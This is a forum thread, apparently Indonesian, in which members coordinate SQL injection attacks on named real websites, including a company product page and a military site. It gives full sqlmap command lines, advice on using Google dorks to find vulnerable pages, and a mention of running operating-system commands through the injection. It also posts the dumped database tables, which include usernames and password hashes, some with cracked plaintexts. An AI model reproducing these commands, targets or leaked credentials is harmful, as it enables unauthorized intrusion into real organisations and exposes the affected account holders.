03-22-2012, 07:22 PM
ok om
<< back|track'ers newbee
03-22-2012, 11:18 PM
(03-22-2012, 07:22 PM)fake666 Wrote: ok om ok,,yuk mari mulai,,kita bahas apa dulu nah ane ada vulner ni C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --random-agent --threads 5 -D altechna2 -T additional_user --columns niat coba? koneksi ku g terlalu kuat buat inject wkwkwk
03-22-2012, 11:23 PM
(03-22-2012, 11:18 PM)junior.riau18 Wrote:ayok om??(03-22-2012, 07:22 PM)fake666 Wrote: ok om mau coba punya ane juga gak?? python sqlmap.py -u "www.tni.mil.id/index2.php?page=datagallery.html&gctg_code=27" --random-agent --threads 10 --dbs oh iya mau nany juga..si om nyari vulnernya pake apa? << back|track'ers newbee
03-22-2012, 11:29 PM
om g ada yang lebih seram targetnya -____-" tni mak jank wkwkw
pakek google google dork,,biasa kan buat nya inurl:product.php?id= nah ane g pakek inurl,,langsung product.php?id=,,terserah kita si,,itu mainan imajinasi aja nah selesai inject kita cba yang ente maksud ini dia optionnya : Code: --os-cmd=OSCMD Execute an operating system command
03-22-2012, 11:38 PM
akwkawa
dari pada kemarin polri akwkaw tapi itu adminnya cuman disable klik kanan gak ngepacth sistimnya ya ane test aja == nunggu si om dulu akwkaw sekalian om bikinin tutorialnya << back|track'ers newbee
03-22-2012, 11:44 PM
surem dah ente bisa di bom ane wkwkwk pakek target ane aja gimana??target luar lebih aman sedikit
silahkan didump dulu ajah untuk tabel ganti aja langsung ke tabel "users" ilangin kutipnya ya
03-22-2012, 11:49 PM
akwka ini aja lagi gemeteran..
oke omm lagi di liat2 nih isinya << back|track'ers newbee
03-22-2012, 11:58 PM
makanya jangan yang aneh2 dah wkwkwkwkkw
kalo dah kelar dump tbl users post dimari atau pm ane aja
03-23-2012, 12:02 AM
Database: altechna2
Table: adminlog [6 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | action | varchar(255) | | item_id | int(11) | | item_name | varchar(50) | | timestamp | int(11) | | user_id | int(11) | | username | varchar(25) | +-----------+--------------+ Database: altechna2 Table: additional_users [4 columns] +---------------------+---------+ | Column | Type | +---------------------+---------+ | additional_users_id | int(11) | | content_id | int(11) | | page_id | int(11) | | user_id | int(11) | +---------------------+---------+ Database: altechna2 Table: additional_users [0 entries] +---------------------+ | additional_users_id | +---------------------+ +---------------------+ no found something == ad yang mau coba juga ? maaf tadi salah ada ada om junior.riau18 nih dia Database: altechna2 Table: users [3 entries] +--------------------------------------------+------------+ | password | username | +--------------------------------------------+------------+ | f49e49c743ab7195b10386bef8ac9943 | mediaforma | | c9330587565205a5b8345f60c620ecc6 (editor1) | editor | | 6acb0784b9dde050a12dc69edc69b45f (namas) | admin | +--------------------------------------------+------------+ tapi gak bisa login arghh== << back|track'ers newbee
03-23-2012, 12:10 AM
pakek tabl users,,ada 70 tabel disana om
kalo g percaya coba aja bbuat -D altechna2 --tables,, ntarlihat berapa banyak blikan tabelnya wkwkkw |